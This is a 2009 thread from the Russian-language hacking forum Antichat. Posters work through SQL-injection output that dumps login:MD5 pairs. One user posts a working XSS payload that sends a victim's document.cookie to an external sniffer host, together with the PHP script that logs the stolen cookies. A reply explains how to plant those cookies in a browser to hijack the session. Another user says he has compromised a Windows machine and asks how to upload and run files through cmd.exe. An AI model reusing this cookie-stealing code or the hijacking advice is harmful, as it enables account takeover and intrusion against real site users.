ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

29.07.2009, 22:24
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме: 4532332
Репутация:
1196
|
|
Сообщение от nub-hacker
после зелёного идёт MD5
это понятно что мд5,но эта часть во всех записях не меняется .
|
|
|

29.07.2009, 22:27
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
L I G A
Меняется окончание логина? Где разделитель-то?
или concat_ws(0x3a,login,pass) или concat(login,0x3a,pass), ты уж определись
|
|
|

29.07.2009, 22:30
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме: 4532332
Репутация:
1196
|
|
concat_ws(0x3a,login,pass)
login363307:5f4dcc3b5aa765d61d8327deb882cf99
меняется:
login363307:5f4dcc3b5aa765d61d8327deb882cf99
Последний раз редактировалось L I G A; 29.07.2009 в 22:37..
|
|
|

29.07.2009, 22:42
|
|
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме: 1777055
Репутация:
347
|
|
наверно таки у них пароли одинаковые) будто бы какой-то неоригинальный реггер заюзали
|
|
|

29.07.2009, 22:44
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме: 347165
Репутация:
-67
|
|
Это чтото типа соли. токо для логина. короче лучше ставь себе этот двиг на машину и ковыряйся и разбирайся
|
|
|

29.07.2009, 22:57
|
|
Новичок
Регистрация: 15.07.2009
Сообщений: 20
Провел на форуме: 271833
Репутация:
4
|
|
Подскажите, на снифер приходят такого рода данные
com=iua=1;%20b=b;%20iua=1;%20b=b;%20holder=1;%20UH =25a4c4a69cc7f;%20I=24c6983d0fe73223;%20L=1.11
благодаря xss на уязвимом сайте , тобиш тело письма такое
Код HTML:
<script>document.location.replace('http://*****.t35.com/script.php?com='+document.cookie);</script>
код снифа :
PHP код:
<? $query = $_SERVER['QUERY_STRING']; $query .= "\n"; $db="cookies.txt"; $fh=fopen ($db, "a+"); fputs ($fh, "$query"); fclose ($fh); ?>
что обозначают полученные данные, тоесть что приходит...?
|
|
|

29.07.2009, 23:09
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме: 1469161
Репутация:
142
|
|
Сообщение от ph1l1ster
Уязвимости php 5.2 ??
http://www.xakep.ru/vulnerability/PHP/
Так точно,сержант Витя )У мя от нижеприведённого сплойта сознание уплывает)Ну что ж,попробую чтоли : Р
|
|
|

29.07.2009, 23:10
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
$_SERVER['QUERY_STRING']
|
|
|

29.07.2009, 23:32
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме: 347165
Репутация:
-67
|
|
Хакнул комп с помошбю последнего сплоита под мастдай. есть cmd.exe подскажите как залить мне файл туда. чтобы потом его выполнить или чтото подобное подскажите что можно с делать в моём случае
ЗЫ с меня +
|
|
|

30.07.2009, 03:37
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме: 4038468
Репутация:
1224
|
|
Сообщение от kiddie
Подскажите, на снифер приходят такого рода данные
com=iua=1;%20b=b;%20iua=1;%20b=b;%20holder=1;%20UH =25a4c4a69cc7f;%20I=24c6983d0fe73223;%20L=1.11
благодаря xss на уязвимом сайте , тобиш тело письма такое
Код HTML:
<script>document.location.replace('http://*****.t35.com/script.php?com='+document.cookie);</script>
код снифа :
PHP код:
<? $query = $_SERVER['QUERY_STRING']; $query .= "\n"; $db="cookies.txt"; $fh=fopen ($db, "a+"); fputs ($fh, "$query"); fclose ($fh); ?>
что обозначают полученные данные, тоесть что приходит...?
 это мой друг к тебе пришли куки (Ку́ки (слово не склоняется; от англ. cookie — печенье) — небольшой фрагмент данных, созданный веб-сервером и хранимый на компьютере пользователя в виде файла, который веб-клиент (обычно веб-браузер) каждый раз пересылает веб-серверу в HTTP-запросе при попытке открыть страницу соответствующего сайта. © ru.wikipedia.org)
Теперь твоя задача, подменить на полученные данные, свои. А сделать это можно следующим образом:
- Mozilla Firefox - при помощи плагина: Add N Edit Cookies
- Opera - следующей манипуляцией: "Инструменты -> Дополнительно -> Управление cookies..."
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|